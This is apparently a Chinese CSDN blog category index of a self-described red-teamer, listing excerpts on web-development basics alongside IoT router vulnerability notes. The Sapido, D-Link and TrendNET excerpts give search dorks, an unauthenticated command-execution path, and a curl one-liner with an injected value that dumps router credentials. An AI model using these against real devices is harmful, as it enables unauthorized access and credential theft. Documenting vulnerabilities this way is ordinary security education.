安全
文章平均质量分 57
html+css+javascript
Vibe~
国内一线红队,擅长攻防渗透
展开
-
thinkPHP 8.0.4 安装
windows安装thinkphp8.x原创 2024-09-20 11:00:00 · 513 阅读 · 0 评论 -
IOT漏洞
IOT的安全问题原创 2021-03-08 14:10:50 · 4072 阅读 · 0 评论 -
Sapido多款路由器命令执行漏洞
影响版本BR270n-v2.1.03 BRC76n-v2.1.03 GR297-v2.1.3 RB1732-v2.0.43漏洞实例fofa搜索app="Sapido-路由器"poc:ip/syscmd.htm即可以输入命令执行原创 2021-03-09 17:19:25 · 6880 阅读 · 0 评论 -
D-Link DSL-2888A 远程命令执行漏洞(CVE-2020-24581/24579)
漏洞详情D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在和远程命令执行漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行。漏洞影响AU_2.31_V1.1.47ae55之前版本EG_1.00b4漏.原创 2021-03-09 17:54:41 · 4596 阅读 · 0 评论 -
TrendNET路由器权限绕过漏洞(CVE-2018-7034)
TrendNET路由器权限绕过漏洞,攻击者通过设置$AUTHORIZED_GROUP >= 1绕过权限验证影响版本:TEW-751DR – v1.03B03 TEW-752DRU – v1.03B01漏洞测试fofa搜索:"TEW-751DR "curl -d "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1" http://ip/getcfg.php获取到登录的用户名和密码...原创 2021-03-09 18:01:36 · 4657 阅读 · 0 评论 -
htmlspecialchars() 函数
把预定义的字符 "<" (小于)和 ">" (大于)转换为 HTML 实体,把 < 和 > 转换为实体常用于防止浏览器将其用作 HTML 元素。但是用户又需要在页面上显示输入时,转换为HTML实体能防止代码的运行。如在xss的防御中就能够体现,如...原创 2021-03-14 10:51:36 · 4584 阅读 · 0 评论 -
JS进行base64编码与解码
从IE10+浏览器开始,所有浏览器就原生提供了Base64编码、解码方法,不仅可以用于浏览器环境,Service Worker环境也可以使用。方法名就是 atob 和 btoa ,具体语法如下<script> //编码 var encodedata = window.btoa('hello beijing') document.write('编码:',encodedata) document.write('</..原创 2021-07-02 11:45:53 · 7034 阅读 · 1 评论 -
解决 PHP 输出中文乱码的问题
PHP 文件的头部加上如下代码:<?phpheader("Content-type:text/html;charset=utf-8");?>就解决了原创 2021-03-23 17:44:43 · 4467 阅读 · 0 评论 -
JavaScript阶段二之Web APIs
目录前言APIWebAPIDOM获取页面元素事件前言在之前我们已经了解js的组成:https://blog.csdn.net/qq_44159028/article/details/119454230之前,我们学的是js的基础语法,即ECMAscript标准规定的基本语法,要求我们掌渥Js 基础语法。但是只学习基本语法,做不了常用的网页交互效果,所以需要学习Web APIs。web APIs是w3c组织的标准。web APIs 我们主要学习DOM和BOM。w.原创 2021-08-11 17:27:44 · 4155 阅读 · 0 评论 -
JavaScript之对象(四)
对象现实生活中︰万物皆对象,对象是一个具体的事物,看得见摸得着的实物。例如,一本书、一辆汽车、一个人可以是“对象”,一个数据库、一张网页、一个与远程服务器的连接也可以是“对象”。在JavaScript中,对象是一组无序的相关属性和方法的集合,所有的事物都是对象,例如字符串、数值、数组、函数等。心对象是由属性和方法组成的。属性∶事物的特征,在对象中用属性来表示(常用名词) 方法∶事物的行为,在对象中用方法来表示(常用动词)创建对象创建对象(object)有三种方式利用字面量创建对原创 2021-08-11 14:46:10 · 3885 阅读 · 0 评论 -
JavaScript之数组与函数(三)
数组数组是指一组数据的集合,其中的每个数据被称作元素,在数组中可以存放任意类型的元素。数组是一种将一组数据存储在单个变量名下的优雅方式。1. 创建数组JS中创建数组有两种方式:利用new创建数组 利用数组字面量创建数组(常用)利用new创建数组var 数组名 = new Array(); //创建一个空数组利用数组字面量创建数组var arr1 = [1, 2, '你好', true]; 2. 数组的操作索引(下标)∶用来访问数组元素的序号(数组索..原创 2021-08-10 14:43:22 · 4589 阅读 · 1 评论 -
JavaScript基础语法(二)
比较运算符(关系运算符)是两个数据进行比较时所使用的运算符,比较运算后,会返回一个布尔值( true / false )作为比较运算的结果。到哪个就执行对应的case中的语句,然后break退出整个switch语句,如果都没有匹配上则执行defalut中的语句。,然后你可以一步一步往下调试,调试过程中可以看各个变量当前的值,出错的话,调试到出错的代码行即显示错误,停下。一个非负的整数,比要提取的子串的最后一个字符在 stringObject 中的位置多 1。后面开发中经常用于多个条件的判断。原创 2021-08-09 16:21:44 · 5259 阅读 · 2 评论 -
JavaScript基础语法(一)
历史布兰登.艾奇(1961~),在1995年中利用10天完成了JavaScript的设计JavaScript是世界上最流行的语言之一,是一种运行在客户端的脚本语言( Script是脚本的意思)脚本语言:不需要编译,运行过程中由js解释器(js 引擎)逐行来进行解释并执行。现在也可以基于Node.js技术进行服务器端编程js作用表单动态校验(密码强度检测)(JS产生最初的目的) 网页特效 服务端开发(Node.js)(现在前后端通吃了) 桌面程序(Electron) App(Cordo原创 2021-08-07 23:29:16 · 5249 阅读 · 8 评论 -
HTML基础
您可以使用 HTML 来建立自己的 WEB 站点,HTML 运行在浏览器上,由浏览器来解析。type类型为hidden的为隐藏表单,在前端页面不可见,但是放置在form表单中进行传值的时候也默认会将value值进行传递。form表单用于将其他表单标签"包"起来,以便作为一个整体,将填写的数据提交到服务器。html文档的后缀为.html或者.htm,两种后缀没有区别都可以使用。-- 在此处写注释 -->原创 2021-05-16 16:13:18 · 4801 阅读 · 0 评论 -
CSS学习笔记之CSS属性(二)
CSS学习笔记之选择器(一)通过前一章的学习,我们大概掌握了css的几种常用选择器的方法,也学习了css的一些属性比如width、hight、background等。下面开始了解一下更复杂的属性浮动样式 float如果不加float的话,下面两个标签默认是竖着排的,下面让他们横着排<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>css练习</titl原创 2021-08-04 17:56:13 · 4231 阅读 · 2 评论 -
CSS学习笔记之选择器(一)
CSS 规则由两个主要的部分构成:选择器,以及一条或多条声明:选择器通常是您需要改变样式的 HTML 元素。每条声明由一个属性和一个值组成。属性(property)是您希望设置的样式属性(style attribute)。每个属性有一个值。属性和值被冒号分开。原创 2021-08-02 22:37:50 · 4330 阅读 · 1 评论 -
js中常用函数
lastIndexOf()索引从0开始,返回一个指定的字符串值(字符串中最开始的一个字符)最后出现的索引位置<script> var str="i am nice today to"; var i=str.lastIndexOf("i"); //索引从0开始,返回一个指定的字符串值(字符串中最开始的一个字符)最后出现的索引位置 document.write(i+'<br>') //输出6 var am=str.lastIndexOf("原创 2021-06-21 11:43:10 · 4794 阅读 · 0 评论